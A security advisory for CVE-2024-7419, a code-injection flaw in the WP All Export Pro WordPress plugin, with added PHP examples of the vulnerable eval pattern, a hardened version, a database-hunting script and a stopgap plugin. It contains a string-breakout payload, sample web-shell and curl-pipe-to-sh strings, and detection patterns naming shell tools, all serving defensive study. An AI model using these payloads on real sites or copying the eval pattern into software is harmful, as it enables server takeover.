CVE-2024-7419 Overview
CVE-2024-7419 is a Remote Code Execution (RCE) vulnerability in the WP All Export Pro plugin for WordPress, developed by Soflyy. The flaw affects all plugin versions up to and including 1.9.1. It stems from missing input validation and sanitization of the values substituted into custom export fields: data that an attacker can supply is incorporated into a PHP expression that the plugin evaluates server-side during the export, so the attacker's content is executed as code. Exploitation requires that a configured custom export field reference a field whose contents an untrusted party can supply (post, comment, custom field, or form-submission data). The issue is tracked under CWE-94: Improper Control of Generation of Code.
Critical Impact
Unauthenticated attackers can plant PHP code in user-supplied content that a custom export field later evaluates, achieving remote code execution under the web server account and complete compromise of the affected WordPress installation once an export runs.
Affected Products
- Soflyy WP All Export Pro plugin for WordPress
- All versions up to and including 1.9.1
- WordPress sites where custom export fields include user-supplied data
Discovery Timeline
- 2025-02-07 - CVE-2024-7419 published to the National Vulnerability Database
- 2025-02-11 - Last updated in NVD database
Technical Details for CVE-2024-7419
Vulnerability Analysis
The WP All Export Pro plugin allows administrators to define custom export fields using PHP expressions for advanced data transformation, and it evaluates these expressions at export runtime. When a custom export field references user-supplied data, the plugin fails to validate or sanitize that input before incorporating it into the evaluated PHP context. An attacker who can submit data that ends up in an exported record can therefore plant a PHP payload that the server executes the next time the export runs.
Because execution occurs in the WordPress PHP process, payloads run with the privileges of the web server user. This enables arbitrary command execution, webshell installation, credential theft from wp-config.php, lateral movement, and persistence. The attack is network-based and requires no authentication; it does, however, depend on an export that includes the poisoned record actually being run, whether by an administrator or by a scheduled job, which is the user-interaction component of the vector.
Root Cause
The root cause is improper control of code generation [CWE-94]. The plugin treats user-supplied content as trusted when constructing or evaluating PHP code within custom export field handlers. There is no allowlist, escaping, or sandboxing of values that originate from public-facing data sources such as posts, comments, custom post types, or form submissions.
Attack Vector
An unauthenticated attacker submits crafted content to a public input vector that is later included in a custom export, such as a post body, comment field, custom field, or third-party form plugin entry. The payload uses PHP syntax that terminates the string or expression context the plugin builds around the field value, so that the remainder is parsed as attacker-chosen code; no <?php open tag is required for this. When an administrator or scheduled job runs the export, the plugin evaluates the field and executes the injected PHP. Successful exploitation yields full server-side code execution under the WordPress process account.
No verified public proof-of-concept code is available. See the Wordfence Vulnerability Report for additional technical context.
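To make the root cause concrete, here is an added example (written for this page; it is not WP All Export Pro's code and not a proof of concept against it) that models the CWE-94 pattern described under Vulnerability Analysis, Root Cause and Attack Vector: an admin-authored template whose {Field} placeholders are filled from each exported record and then handed to eval(). The template syntax, the function names render_vulnerable and render_hardened, the ALLOWED_FUNCTIONS list and the sample record are assumptions for illustration; PHP 7.4 or later is assumed.

```php
<?php
// Added example: a minimal model of the CWE-94 pattern described above.
// It is NOT WP All Export Pro's code; template syntax, function names and the
// record layout are assumptions made for illustration (PHP 7.4+).

declare(strict_types=1);

/** Admin-authored template; {Field} placeholders are filled from each exported record. */
const TEMPLATE = 'strtoupper({Title})';

/** Functions an export template may call (assumed allowlist, illustration only). */
const ALLOWED_FUNCTIONS = ['strtoupper', 'strtolower', 'trim', 'substr'];

/**
 * VULNERABLE: record values are spliced into PHP source text as the contents
 * of a double-quoted literal, so a value containing a closing quote turns
 * data into code (and "$var"/"{$expr}" interpolation is reachable as well).
 */
function render_vulnerable(string $template, array $record): string
{
    $code = preg_replace_callback(
        '/\{(\w+)\}/',
        fn(array $m): string => '"' . (string) ($record[$m[1]] ?? '') . '"',
        $template
    );
    return (string) eval("return $code;");
}

/**
 * HARDENED: (1) only allowlisted function names may appear in the template,
 * and (2) each value is embedded as a single-quoted literal escaped by
 * var_export(), so it can neither terminate the string nor be interpolated.
 * eval() is still reachable by administrators; the fix only stops *data*
 * from becoming code.
 */
function render_hardened(string $template, array $record): string
{
    if (preg_match_all('/\b([A-Za-z_]\w*)\s*\(/', $template, $calls)) {
        foreach ($calls[1] as $fn) {
            if (!in_array(strtolower($fn), ALLOWED_FUNCTIONS, true)) {
                throw new InvalidArgumentException("Function not allowed in export template: $fn");
            }
        }
    }
    $code = preg_replace_callback(
        '/\{(\w+)\}/',
        fn(array $m): string => var_export((string) ($record[$m[1]] ?? ''), true),
        $template
    );
    return (string) eval("return $code;");
}

// Constructed record: the Title is attacker-controlled (e.g. a public submission).
// Note that it contains no PHP open tag; a closing quote is all it needs.
$record = ['Title' => 'x") . strrev("detcejni") . ("'];

echo render_vulnerable(TEMPLATE, $record), PHP_EOL;
// -> Xinjected : strrev() ran; with system() in its place this is RCE at export time.

echo render_hardened(TEMPLATE, $record), PHP_EOL;
// -> X") . STRREV("DETCEJNI") . ("  : the payload is just an uppercased string.
```

The hardened version keeps eval(), which is the feature the plugin exposes to administrators; what it removes is the path from untrusted data to code. The value becomes a single-quoted literal that var_export() has escaped, so it can neither close the string nor be interpolated the way a double-quoted literal could, and the template itself may only call allowlisted functions. The sample payload is worth keeping in mind when reading the Detection and Workarounds sections: it contains no <?php or <?= sequence at all.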
Detection Methods for CVE-2024-7419
Indicators of Compromise
- Unexpected PHP files written under wp-content/uploads/, wp-content/plugins/, or the WP All Export working directory
- WordPress post, comment, or custom field content containing PHP open tags (<?php, <?=), variable-interpolation syntax such as ${ or {$, backtick shell-execution operators, or quote-and-parenthesis sequences that terminate a string literal inside an expression and go on to call a function
- Outbound network connections from the php-fpm or web server process to attacker-controlled hosts during scheduled export windows
- Modifications to wp-config.php, .htaccess, or theme functions.php shortly after an export run
Detection Strategies
- Hunt WordPress database tables (wp_posts, wp_postmeta, wp_comments) for embedded PHP code patterns using regex on raw content.
- Monitor file integrity on the WordPress document root and alert on new or modified .php files outside of expected plugin update windows.
- Inspect WP All Export Pro custom export field configurations for expressions that reference unsanitized user-supplied fields.
- Correlate wp-cron or scheduled export execution events with anomalous child process activity from the PHP runtime.
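The database hunt in the first detection strategy, as an added example (not from the original page or the plugin): a PHP function that scans rows drawn from wp_posts, wp_comments and wp_postmeta for the indicator patterns listed above and returns one finding per match with a short excerpt for triage. The row shape, the sample rows and the function name find_php_injections are constructed for illustration.

```php
<?php
// Added example (not part of the original page or the plugin): hunt stored
// WordPress content for the injection indicators listed above. The row shape
// and the sample rows are constructed for illustration.

declare(strict_types=1);

/** Indicator patterns; the key is the label that lands in the finding. */
const INJECTION_PATTERNS = [
    'php_open_tag'      => '/<\?(php\b|=)/i',
    'backtick_exec'     => '/`[^`\n]{1,200}`/',
    'var_interpolation' => '/\$\{|\{\$/',
    'expr_breakout'     => '/["\']\s*\)\s*[.;]\s*[A-Za-z_]\w*\s*\(/', // e.g.  ") . func(
    'dangerous_call'    => '/\b(eval|system|exec|shell_exec|passthru|popen|proc_open|assert)\s*\(/i',
];

/**
 * Scan rows of [table, id, column, content] and return one finding per
 * matching pattern, with an excerpt around the match. Nothing is modified:
 * sites that publish code tutorials will legitimately trip php_open_tag, so
 * the output is a triage list, not a verdict.
 */
function find_php_injections(array $rows): array
{
    $findings = [];
    foreach ($rows as $row) {
        foreach (INJECTION_PATTERNS as $label => $regex) {
            if (preg_match($regex, $row['content'], $m, PREG_OFFSET_CAPTURE)) {
                $offset = max(0, $m[0][1] - 20);
                $findings[] = [
                    'table'   => $row['table'],
                    'id'      => $row['id'],
                    'column'  => $row['column'],
                    'pattern' => $label,
                    'excerpt' => substr($row['content'], $offset, 80),
                ];
            }
        }
    }
    return $findings;
}

// Constructed sample rows standing in for wp_posts / wp_comments / wp_postmeta.
$rows = [
    ['table' => 'wp_posts',    'id' => 101,  'column' => 'post_content',
     'content' => 'Welcome to our store. Free shipping over $50!'],
    ['table' => 'wp_comments', 'id' => 55,   'column' => 'comment_content',
     'content' => 'Great post <?php system($_GET["c"]); ?>'],
    ['table' => 'wp_posts',    'id' => 102,  'column' => 'post_title',
     'content' => 'x") . system("id") . ("'],
    ['table' => 'wp_postmeta', 'id' => 9001, 'column' => 'meta_value',
     'content' => 'price: `curl http://example.invalid/s | sh`'],
];

foreach (find_php_injections($rows) as $f) {
    printf("%-12s id=%-5d %-16s %-17s %s\n",
        $f['table'], $f['id'], $f['column'], $f['pattern'], $f['excerpt']);
}
// Row 101 produces nothing; 55 trips php_open_tag and dangerous_call; 102 trips
// expr_breakout and dangerous_call (no open tag involved); 9001 trips backtick_exec.
// Against a live site, run this with `wp eval-file hunt.php` and build $rows from
// `global $wpdb; $wpdb->get_results("SELECT ID AS id, post_content AS content FROM {$wpdb->posts}", ARRAY_A);`
```

Two practitioner notes: the expr_breakout pattern exists because the attack described above does not need a PHP open tag, so a hunt keyed only on <?php misses the most direct payload shape; and every hit still needs a human look, since a comment quoting a PHP snippet in a support thread matches just as readily as an implant.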
Monitoring Recommendations
- Enable web application firewall logging for requests submitting content containing PHP tag sequences to public WordPress endpoints.
- Alert on the WordPress PHP process spawning shell utilities such as sh, bash, curl, wget, or python.
- Track outbound DNS and HTTP requests from web servers to newly registered or low-reputation domains.
How to Mitigate CVE-2024-7419
Immediate Actions Required
- Update the WP All Export Pro plugin to a version later than 1.9.1 as soon as the vendor publishes a fix.
- Audit all configured custom export fields and remove any PHP expressions that reference user-supplied data fields.
- Scan the WordPress database and filesystem for embedded PHP payloads and webshells planted prior to patching.
- Rotate WordPress administrator credentials, database passwords, and API keys stored in wp-config.php if compromise is suspected.
Patch Information
Soflyy has been notified through the Wordfence disclosure process. Administrators should consult the Wordfence Vulnerability Report and the WP All Import vendor site for the current fixed version and upgrade guidance. Apply updates through the WordPress plugin manager or by replacing the plugin directory with the patched release.
Workarounds
- Temporarily disable WP All Export Pro on sites that cannot patch immediately, particularly those accepting public submissions.
- Restrict export execution to trusted administrators and disable scheduled exports until custom field configurations are reviewed.
- Deploy WAF rules that block requests containing PHP open-tag sequences (<?php, <?=) in public input fields feeding WordPress content. This catches only one payload class: an expression-context breakout needs no open tag, so treat the rule as a partial stopgap rather than a substitute for the update, deactivation, or the export-field audit.
- Apply least-privilege filesystem permissions on the WordPress document root to limit the impact of any successful code execution.
# Locate suspicious PHP payloads in WordPress content. Adjust the wp_ table prefix
# to match the site (`wp db prefix` prints it). LIKE is used instead of REGEXP so
# the "?" does not need double escaping through the shell and the MySQL string parser;
# with the original REGEXP '<\\?(php|=)' the backslash was consumed and "<?" became
# an optional "<", matching every row containing "php" or "=".
wp db query "SELECT ID, post_title FROM wp_posts WHERE post_content LIKE '%<?php%' OR post_content LIKE '%<?=%' OR post_title LIKE '%<?php%' OR post_title LIKE '%<?=%'"
wp db query "SELECT comment_ID, comment_post_ID FROM wp_comments WHERE comment_content LIKE '%<?php%' OR comment_content LIKE '%<?=%'"
# Disable the vulnerable plugin until patched (confirm the slug with `wp plugin list` first)
wp plugin deactivate wp-all-export-pro
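The WAF-style workaround (rejecting PHP open tags in public input), as an added example implemented inside WordPress for sites that have no WAF in front of them: a must-use plugin that refuses unauthenticated POST requests whose parameters or raw body carry <?php or <?=. It is not WP All Export Pro code and not a fix for the vulnerability; the file location (wp-content/mu-plugins/) and the function names are assumptions for illustration.

```php
<?php
/**
 * Plugin Name: Reject PHP open tags in unauthenticated writes (stopgap)
 * Description: Added example of the WAF-style workaround above, as a must-use
 *              plugin (wp-content/mu-plugins/). Not WP All Export Pro code and
 *              not a fix; function names are assumptions for illustration.
 */

defined('ABSPATH') || exit;

/** True if a string carries a PHP open tag; "<?xml" and a bare "<?" are ignored. */
function stopgap_has_php_open_tag(string $s): bool
{
    return (bool) preg_match('/<\?(php\b|=)/i', $s);
}

/** Recursively inspect a request parameter (scalars and nested arrays). */
function stopgap_input_has_php_open_tag($value): bool
{
    if (is_array($value)) {
        foreach ($value as $v) {
            if (stopgap_input_has_php_open_tag($v)) {
                return true;
            }
        }
        return false;
    }
    return is_string($value) && stopgap_has_php_open_tag($value);
}

add_action('init', function (): void {
    // Only unauthenticated writes are screened: editors and administrators
    // paste code into the editor legitimately, and blocking them would break
    // the site without reducing the unauthenticated attack surface.
    if (($_SERVER['REQUEST_METHOD'] ?? 'GET') !== 'POST' || is_user_logged_in()) {
        return;
    }
    // $_POST covers form posts (comments, front-end form plugins); the raw body
    // covers JSON sent to the REST API.
    $raw = (string) file_get_contents('php://input');
    if (stopgap_input_has_php_open_tag($_POST) || stopgap_has_php_open_tag($raw)) {
        wp_die('Request rejected.', 'Forbidden', ['response' => 403]);
    }
}, 0);
```

The same limitation stated for the WAF rule applies here: this only stops payloads that carry an open tag, while the expression-context breakout described under Attack Vector needs none, so it narrows the exposure without closing it. Keep the plugin update, the deactivation, and the export-field audit as the actual remediation and remove this file once they are done.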
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.


